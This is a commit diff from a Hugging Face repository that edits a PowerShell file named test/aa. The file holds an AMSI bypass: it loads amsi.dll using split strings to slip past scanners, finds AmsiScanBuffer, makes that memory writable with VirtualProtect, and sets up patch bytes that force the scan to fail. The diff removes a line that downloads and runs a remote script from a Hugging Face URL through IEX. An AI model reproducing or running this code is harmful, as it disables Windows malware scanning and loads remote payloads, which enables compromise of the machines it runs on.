enotkrutoy commited on
Commit
cc36ebd
·
verified ·
1 Parent(s): 203748c

Update test/aa

Browse files
Files changed (1) hide show
  1. test/aa +1 -2
test/aa CHANGED
@@ -24,5 +24,4 @@ $LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
24
  $Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
25
  $p = 0
26
  [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
27
- $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
28
- IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/bb')
 
24
  $Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
25
  $p = 0
26
  [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
27
+ $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)